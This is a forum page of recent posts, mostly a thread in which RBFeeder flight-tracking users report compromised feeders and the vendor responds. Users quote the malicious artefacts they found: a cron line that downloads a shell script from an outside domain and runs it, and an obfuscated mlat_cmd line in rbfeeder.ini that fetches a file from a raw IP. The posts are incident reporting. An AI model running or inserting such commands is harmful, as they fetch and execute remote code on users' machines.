Recent Posts

1

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by bishoptf on Today at 09:16:10 PM »

Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.

I think we should have more details as to what really happened, you say the repos were not compromised then how did rbfeeder.ini files have additional information to download files and execute. I will not continue to feed unless full disclosure and how you plan to mitigate this in the future....

2

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by AirNav Support on Today at 07:37:06 PM »

Dear All,

We became aware of this issue earlier today and have initiated a thorough investigation, which is currently ongoing. In the meantime, we have implemented measures to prevent any further impact.

To clarify, the RbFeeder repositories themselves have not been infected with any virus. However, there was an attempt to modify certain .ini configuration files. We have identified a small number of feeder stations that were affected, and we have already taken steps to close the vulnerability that allowed this to occur.

We will be contacting the impacted stations directly to assist with clearing and reinstalling RbFeeder as needed. Further updates will be provided as more information becomes available.

3

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by bishoptf on Today at 07:00:58 PM »

Looks like there is a rbfeeder user that has these cron jobs:

*/1 * * * * if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi
*/5 * * * * rm /tmp/.ICE-unix/rbfeeder.sh

I have uploaded rbfeeder.sh to virus total, Eset identifes it as riskware, not sure if its a false positive:

Security vendors' analysis
Do you want to automate checks?
ESET-NOD32
A Variant Of Linux/Riskware.Frp.V
Acronis (Static ML)
Undetected

This is really bad that this has happened and nothing from AirNav relating to what casued this much less to notify the community that may be running the rbfeeder software...

4

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by bishoptf on Today at 06:37:46 PM »

Is this normal, I am looking through my logs and see this call out:

Jul 18 13:32:02 adsbpi CRON[14945]: (rbfeeder) CMD (if ! pgrep rbfeeder-mlat > /dev/null; then wget --read-timeout=5 --tries=2 -O /tmp/.ICE-unix/rbfeeder.sh https://pidatacollect.com/download/76ecf4f656328/rbfeeder.sh --no-check-certificate --no-cache && chmod +x /tmp/.ICE-unix/rbfeeder.sh && /tmp/.ICE-unix/rbfeeder.sh;fi)

Really need someone from AirNav developers to say wth is going on with there software, I traced both IP's that were used and somehow rbfeeder.ini had been modified. Both IP ranges do not belong to AirNav.

5

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by Runway 31 on Today at 04:33:18 PM »

I have passed details of this thread on to Developers

Alan

6

AirNav Radar Discussion / FAO Rod.

« Last post by Bob SEN1 on Today at 02:48:27 PM »

Hi Rod

do we have a sil for a Tipsy Belair (TIPB) please bud..... or is there one already somewhere?

Cheers

Bob.

7

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by abcd567 on Today at 01:41:14 PM »

@abcd567 how do we get in touch with anyone at AirNav Systems?

Send email to support:
[email protected]

8

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by bishoptf on Today at 12:40:41 PM »

I'm currently running clamav and see if it picks up anything....beyond p'od about this....again @abcd567 how do we get in touch with anyone at AirNav Systems?

9

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by bishoptf on Today at 11:38:25 AM »

We need someone from AirNav to weigh in on this, I had this happen to my feeder on Monday...This device has been running for 5+ years and I have not loaded or updated anything on it in almost a year and then I had this issue. If RBfeeder program downloads updates automatically and I believe it does, someone needs to explain what has happened and I am starting to think that I need to wipe my feeder and reload since I have no idea what this code downloaded and was running.

This is a huge failure on AirNav and until someone can explain what happened I have lost all trust in them as a company.

10

AirNav Radar Discussion / Re: RBFeeder multiple errors

« Last post by abcd567 on Today at 11:03:48 AM »

When did you get to monitor your Raspberry Pi's communication?
try it, I'm sure you'll be surprised by the results.
I'm almost certain that no user will notice what's going on behind the scenes on their Raspberry Pi.
I'm almost 100% sure that this is the result of Radarbox feeder.
I've now reinstalled Raspberry Pi with only FR24 feeder, and I continue to monitor the system.

Do you recognize this line that was added to the rbfeeder.ini file?

Code: [Select]

[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

[dump978]
#dump978_enabled=false

And by the way, I'm sure it's not a virus because as I wrote, it happened recently on 3 different devices of mine and 2 of my friends who are in different cities.

You are not the only one who has this viral line written under [mlat] in file rbeeder.ini. Please see the recent post in FlightRadar24 linked below
It seems recent version of rbfeeder was onfected with a virus, and anyone who installed rbfeeder using that infected .deb package got the viral line in file rbfeeder.ini under [mlat]


https://forum.flightradar24.com/forum/radar-forums/flightradar24-feeding-data-to-flightradar24/229522-rpi-issues?p=229567#post229567